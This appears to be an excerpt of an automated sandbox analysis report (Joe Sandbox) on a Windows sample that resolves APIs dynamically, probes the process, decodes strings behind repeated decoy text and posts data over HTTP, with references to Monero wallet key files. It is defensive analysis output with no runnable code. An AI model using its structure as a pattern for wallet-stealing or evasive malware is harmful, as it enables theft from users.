16336 2489f0 2 API calls 16334->16336 16335->16317 16336->16330 16338 236542 16337->16338 16340 236549 16338->16340 16357 248a10 GetProcessHeap RtlAllocateHeap 16338->16357 16340->16335 16341 236660 16340->16341 16346 23668f VirtualAlloc 16341->16346 16343 236730 16344 236743 VirtualAlloc 16343->16344 16345 23673c 16343->16345 16344->16345 16345->16326 16346->16343 16346->16345 16348 2369c9 16347->16348 16351 2369d5 16347->16351 16349 236a09 LoadLibraryA 16348->16349 16348->16351 16350 236a32 16349->16350 16349->16351 16354 236ae0 16350->16354 16358 248a10 GetProcessHeap RtlAllocateHeap 16350->16358 16351->16328 16353 236ba8 GetProcAddress 16353->16351 16353->16354 16354->16351 16354->16353 16355 2489f0 2 API calls 16355->16354 16356 236a8b 16356->16351 16356->16355 16357->16340 16358->16356

                                  Executed Functions

                                  Function 00249860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 660 249860-249874 call 249750 663 249a93-249af2 LoadLibraryA * 5 660->663 664 24987a-249a8e call 249780 GetProcAddress * 21 660->664 666 249af4-249b08 GetProcAddress 663->666 667 249b0d-249b14 663->667 664->663 666->667 668 249b46-249b4d 667->668 669 249b16-249b41 GetProcAddress * 2 667->669 671 249b4f-249b63 GetProcAddress 668->671 672 249b68-249b6f 668->672 669->668 671->672 673 249b71-249b84 GetProcAddress 672->673 674 249b89-249b90 672->674 673->674 675 249bc1-249bc2 674->675 676 249b92-249bbc GetProcAddress * 2 674->676 676->675
                                  APIs
                                  • GetProcAddress.KERNEL32(76210000,010416E0), ref: 002498A1
                                  • GetProcAddress.KERNEL32(76210000,010416F8), ref: 002498BA
                                  • GetProcAddress.KERNEL32(76210000,01041500), ref: 002498D2
                                  • GetProcAddress.KERNEL32(76210000,01041710), ref: 002498EA
                                  • GetProcAddress.KERNEL32(76210000,01041728), ref: 00249903
                                  • GetProcAddress.KERNEL32(76210000,010488F8), ref: 0024991B
                                  • GetProcAddress.KERNEL32(76210000,01035048), ref: 00249933
                                  • GetProcAddress.KERNEL32(76210000,01034FA8), ref: 0024994C
                                  • GetProcAddress.KERNEL32(76210000,010415F0), ref: 00249964
                                  • GetProcAddress.KERNEL32(76210000,01041608), ref: 0024997C
                                  • GetProcAddress.KERNEL32(76210000,010417A0), ref: 00249995
                                  • GetProcAddress.KERNEL32(76210000,01041518), ref: 002499AD
                                  • GetProcAddress.KERNEL32(76210000,010351E8), ref: 002499C5
                                  • GetProcAddress.KERNEL32(76210000,01041620), ref: 002499DE
                                  • GetProcAddress.KERNEL32(76210000,010417B8), ref: 002499F6
                                  • GetProcAddress.KERNEL32(76210000,01035168), ref: 00249A0E
                                  • GetProcAddress.KERNEL32(76210000,01041590), ref: 00249A27
                                  • GetProcAddress.KERNEL32(76210000,010415C0), ref: 00249A3F
                                  • GetProcAddress.KERNEL32(76210000,01035008), ref: 00249A57
                                  • GetProcAddress.KERNEL32(76210000,01041638), ref: 00249A70
                                  • GetProcAddress.KERNEL32(76210000,010352A8), ref: 00249A88
                                  • LoadLibraryA.KERNEL32(010414E8,?,00246A00), ref: 00249A9A
                                  • LoadLibraryA.KERNEL32(01041560,?,00246A00), ref: 00249AAB
                                  • LoadLibraryA.KERNEL32(01041680,?,00246A00), ref: 00249ABD
                                  • LoadLibraryA.KERNEL32(01041650,?,00246A00), ref: 00249ACF
                                  • LoadLibraryA.KERNEL32(01041770,?,00246A00), ref: 00249AE0
                                  • GetProcAddress.KERNEL32(75B30000,01041668), ref: 00249B02
                                  • GetProcAddress.KERNEL32(751E0000,01041530), ref: 00249B23
                                  • GetProcAddress.KERNEL32(751E0000,01041548), ref: 00249B3B
                                  • GetProcAddress.KERNEL32(76910000,01048D28), ref: 00249B5D
                                  • GetProcAddress.KERNEL32(75670000,01034FE8), ref: 00249B7E
                                  • GetProcAddress.KERNEL32(77310000,01048998), ref: 00249B9F
                                  • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00249BB6
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00249BAA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 491d5b5a06cc96da00ca8dbb87c644cc3361b58992db2291f65a1461832f4599
                                  • Instruction ID: 5ebe954b90037456eeccbc5b8ec6a0deb5fddaed78e7d0377853b84f2033d9b8
                                  • Opcode Fuzzy Hash: 491d5b5a06cc96da00ca8dbb87c644cc3361b58992db2291f65a1461832f4599
                                  • Instruction Fuzzy Hash: ADA159B5504200AFD348EFB8ED8996E77F9F7CC301705453AA61D83264D63998E6CB1B
                                  Function 002345C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 764 2345c0-234695 RtlAllocateHeap 781 2346a0-2346a6 764->781 782 23474f-2347a9 VirtualProtect 781->782 783 2346ac-23474a 781->783 783->781
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0023460F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0023479C
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234729
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002345DD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234734
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0023471E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002345C7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0023466D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234713
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0023462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0023474F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002346AC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002345E8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234662
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002346C2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234770
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0023477B
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002346B7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234683
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0023473F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234657
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002346CD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002345F3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0023475A
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234765
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00234678
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002346D8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002345D2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: d2ac8f10fa8f904057df08b032ac301375c608fb5b698332f1607f1322bef9df
                                  • Instruction ID: 519b710b85141431d3be9267fa12005c55e15cc2ad83e8bfbfa1b9eb2557df13
                                  • Opcode Fuzzy Hash: d2ac8f10fa8f904057df08b032ac301375c608fb5b698332f1607f1322bef9df
                                  • Instruction Fuzzy Hash: 064167A16D26246EF734BBA48C56F9E7676DF8370AF405062AD4012680CEB47537C719
                                  Function 00234880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 801 234880-234942 call 24a7a0 call 2347b0 call 24a740 * 5 InternetOpenA StrCmpCA 816 234944 801->816 817 23494b-23494f 801->817 816->817 818 234955-234acd call 248b60 call 24a920 call 24a8a0 call 24a800 * 2 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a920 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a920 call 24a8a0 call 24a800 * 2 InternetConnectA 817->818 819 234ecb-234ef3 InternetCloseHandle call 24aad0 call 239ac0 817->819 818->819 905 234ad3-234ad7 818->905 829 234f32-234fa2 call 248990 * 2 call 24a7a0 call 24a800 * 8 819->829 830 234ef5-234f2d call 24a820 call 24a9b0 call 24a8a0 call 24a800 819->830 830->829 906 234ae5 905->906 907 234ad9-234ae3 905->907 908 234aef-234b22 HttpOpenRequestA 906->908 907->908 909 234b28-234e28 call 24a9b0 call 24a8a0 call 24a800 call 24a920 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a920 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a920 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a9b0 call 24a8a0 call 24a800 call 24a920 call 24a8a0 call 24a800 call 24a740 call 24a920 * 2 call 24a8a0 call 24a800 * 2 call 24aad0 lstrlen call 24aad0 * 2 lstrlen call 24aad0 HttpSendRequestA 908->909 910 234ebe-234ec5 InternetCloseHandle 908->910 1021 234e32-234e5c InternetReadFile 909->1021 910->819 1022 234e67-234eb9 InternetCloseHandle call 24a800 1021->1022 1023 234e5e-234e65 1021->1023 1022->910 1023->1022 1024 234e69-234ea7 call 24a9b0 call 24a8a0 call 24a800 1023->1024 1024->1021
                                  APIs
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 002347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00234839
                                    • Part of subcall function 002347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00234849
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00234915
                                  • StrCmpCA.SHLWAPI(?,0104FCA0), ref: 0023493A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00234ABA
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00250DDB,00000000,?,?,00000000,?,",00000000,?,0104FC10), ref: 00234DE8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00234E04
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00234E18
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00234E49
                                  • InternetCloseHandle.WININET(00000000), ref: 00234EAD
                                  • InternetCloseHandle.WININET(00000000), ref: 00234EC5
                                  • HttpOpenRequestA.WININET(00000000,0104FD20,?,0104F3F8,00000000,00000000,00400100,00000000), ref: 00234B15
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00234ECF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: 0aefaabbd044bccd8638b56703b1a74a9be6557f6bb5425540334f6500ab561f
                                  • Instruction ID: 2278862abb28be648497ca1501796a23269f0f56141f6308657676bda5d959f1
                                  • Opcode Fuzzy Hash: 0aefaabbd044bccd8638b56703b1a74a9be6557f6bb5425540334f6500ab561f
                                  • Instruction Fuzzy Hash: 7012FF72961118AAEB19EB90DC92FEEB378FF55300F5041A9B10672091EF702F59CF66
                                  Function 00247850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002311B7), ref: 00247880
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00247887
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0024789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 60b947e30fc9cbfb2d5c8afaba98abd09087f82031a6798f951f9221abeac3c9
                                  • Instruction ID: 4b3019a4c5c9b417237f046bd3f46ec2c6977c05c13e8f0fd28d00dba9b4e064
                                  • Opcode Fuzzy Hash: 60b947e30fc9cbfb2d5c8afaba98abd09087f82031a6798f951f9221abeac3c9
                                  • Instruction Fuzzy Hash: 48F04FB1944208AFC714DF98DD4ABAEBBB8EB45711F10026AFA15A2680C77455548BA2
                                  Function 00231160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 90ba5cdd12f6f3aee84a47a341393359b2db229b0d14cd9d97b69bf917607d75
                                  • Instruction ID: a08c266526780e9ebfb68f5d3021b300a7ead1c3e393d653f2574342d9f72b24
                                  • Opcode Fuzzy Hash: 90ba5cdd12f6f3aee84a47a341393359b2db229b0d14cd9d97b69bf917607d75
                                  • Instruction Fuzzy Hash: 20D09E7490430CDBCB04DFE0D9496DDBB7CFB48716F101565D90962340EA3195E6CAAA
